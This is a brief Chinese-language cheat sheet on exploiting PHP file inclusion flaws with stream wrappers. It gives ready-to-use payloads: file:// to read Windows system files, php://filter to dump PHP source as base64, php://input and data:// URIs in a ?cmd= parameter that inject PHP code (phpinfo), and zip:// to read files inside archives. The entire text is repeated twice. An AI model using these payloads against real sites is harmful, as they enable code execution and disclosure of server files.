文件包含漏洞PHP伪协议利用方法
使用file协议读取Windows的系统文件
使用php://filter协议可以将php代码进行base64编码后显示出来
php://input
抓包,并加上<?php phpinfo() ?>
data://
?cmd=data:text/plain,<?php%20phpinfo();?>
zip://
读取压缩包内的⽂件
?cmd=zip://d:/3.zip/3.txt
使用file协议读取Windows的系统文件
使用php://filter协议可以将php代码进行base64编码后显示出来
php://input
抓包,并加上<?php phpinfo() ?>
data://
?cmd=data:text/plain,<?php%20phpinfo();?>
zip://
读取压缩包内的⽂件
?cmd=zip://d:/3.zip/3.txt